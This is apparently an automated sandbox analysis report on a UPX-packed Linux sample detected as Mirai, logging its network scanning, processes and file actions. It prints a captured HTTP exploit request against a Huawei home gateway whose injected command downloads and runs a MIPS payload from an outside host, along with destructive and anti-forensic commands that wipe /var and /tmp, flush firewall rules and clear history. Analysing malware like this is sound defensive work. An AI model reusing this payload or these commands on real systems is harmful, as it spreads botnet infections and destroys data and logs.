Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.25.4.177:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.208.164.119:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.222.86.36:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.33.150.185:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.128.111.176:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.108.221.249:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.65.142.50:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.245.182.45:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.174.119.241:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.70.222.167:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.22.118.222:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.158.75.210:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.191.81.155:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.157.4.180:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.183.250.210:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.255.117.138:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.251.147.104:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.116.108.125:37215
Sample listens on a socket
Source: /usr/sbin/sshd (PID: 5368) Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5368) Socket: [::]::22
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5301) Iptables executable: /sbin/iptables -> /sbin/iptables -F
Source: /bin/sh (PID: 5302) Iptables executable: /sbin/iptables -> /sbin/iptables -X
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 156.132.235.75
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://23.94.186.250/..23091t/mips;
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: x86 String found in binary or memory: http://upx.sf.net
Source: x86, 5249.1.0000000095c93fa5.000000003788d25b.rw-.sdmp String found in binary or memory: http://www.cisco.com/go/ciscocp
Source: unknown HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com

System Summary:

Sample tries to kill many processes (SIGKILL)
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 658, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 720, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 759, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 772, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 789, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 800, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 904, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 936, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1320, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1334, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1335, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1389, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1809, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1872, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1888, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1983, result: successful
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 2048, result: successful
Source: /usr/bin/pkill (PID: 5286) SIGKILL sent: pid: 2258, result: successful
Source: /usr/bin/pkill (PID: 5286) SIGKILL sent: pid: 4487, result: successful
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0xc01000
Yara signature match
Source: x86, type: SAMPLE Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: x86 Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: classification engine Classification label: mal96.spre.troj.evad.lin@0/9@2/0

Data Obfuscation:

Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior:

Deletes all firewall rules
Source: /bin/sh (PID: 5272) Args: iptables -F
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /bin/fusermount (PID: 5462) File: /proc/5462/mounts
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /bin/sh (PID: 5278) Pkill executable: /usr/bin/pkill -> pkill -9 busybox
Source: /bin/sh (PID: 5284) Pkill executable: /usr/bin/pkill -> pkill -9 perl
Source: /bin/sh (PID: 5286) Pkill executable: /usr/bin/pkill -> pkill -9 python
Source: /usr/share/gdm/generate-config (PID: 5456) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Source: /usr/share/gdm/generate-config (PID: 5571) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 5437) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5439) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5441) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5443) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5445) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5447) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5452) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5454) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5555) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5557) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5559) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5561) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5563) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5565) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5567) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5569) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Enumerates processes within the "proc" file system
Creates hidden files and/or directories
Source: /usr/bin/whoopsie (PID: 5337) Directory: /nonexistent/.cache
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5301) Iptables executable: /sbin/iptables -> /sbin/iptables -F
Source: /bin/sh (PID: 5302) Iptables executable: /sbin/iptables -> /sbin/iptables -X
Sample tries to set the executable flag
Source: /usr/bin/whoopsie (PID: 5337) File: /var/crash (bits: gv usr: rwx grp: rwx all: rwx)
Source: /usr/sbin/gdm3 (PID: 5502) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5502) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5582) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5582) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Executes commands using a shell command-line interpreter
Source: /tmp/x86 (PID: 5256) Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
Source: /tmp/x86 (PID: 5265) Shell command executed: sh -c "rm -rf /var/log/wtmp"
Source: /tmp/x86 (PID: 5267) Shell command executed: sh -c "rm -rf /tmp/*"
Source: /tmp/x86 (PID: 5269) Shell command executed: sh -c "rm -rf /bin/netstat"
Source: /tmp/x86 (PID: 5271) Shell command executed: sh -c "iptables -F"
Source: /tmp/x86 (PID: 5276) Shell command executed: sh -c "pkill -9 busybox"
Source: /tmp/x86 (PID: 5283) Shell command executed: sh -c "pkill -9 perl"
Source: /tmp/x86 (PID: 5285) Shell command executed: sh -c "pkill -9 python"
Source: /tmp/x86 (PID: 5289) Shell command executed: sh -c "service iptables stop"
Source: /tmp/x86 (PID: 5300) Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X"
Source: /tmp/x86 (PID: 5303) Shell command executed: sh -c "service firewalld stop"
Source: /tmp/x86 (PID: 5311) Shell command executed: sh -c "rm -rf ~/.bash_history"
Source: /tmp/x86 (PID: 5313) Shell command executed: sh -c "history -c"
Source: /usr/bin/gpu-manager (PID: 5436) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5438) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5440) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5442) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5444) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5446) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5451) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5453) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5554) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5556) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5558) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5560) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5562) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5564) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5566) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5568) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 5257) Rm executable: /usr/bin/rm -> rm -rf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /tmp/x86 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te 
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
Source: /bin/sh (PID: 5266) Rm executable: /usr/bin/rm -> rm -rf /var/log/wtmp
Source: /bin/sh (PID: 5268) Rm executable: /usr/bin/rm -> rm -rf /tmp/*
Source: /bin/sh (PID: 5270) Rm executable: /usr/bin/rm -> rm -rf /bin/netstat
Source: /bin/sh (PID: 5312) Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history
Source: /usr/bin/gpu-manager (PID: 5553) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/service (PID: 5297) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: /usr/sbin/service (PID: 5310) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Sample deletes itself
Source: /usr/bin/rm (PID: 5257) File: /tmp/x86
Uses known network protocols on non-standard ports

Malware Analysis System Evasion:

Deletes security-related log files
Source: /usr/bin/rm (PID: 5266) Truncated file: /var/log/wtmp
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5278) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5284) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5286) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5410) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5456) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5571) Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/whoopsie (PID: 5337) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5410) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5435) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5553) Queries kernel information via 'uname':
Deletes log files
Source: /usr/bin/rm (PID: 5266) Truncated file: /var/log/wtmp
Source: /usr/bin/gpu-manager (PID: 5435) Truncated file: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5553) Truncated file: /var/log/gpu-manager.log

Stealing of Sensitive Information:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP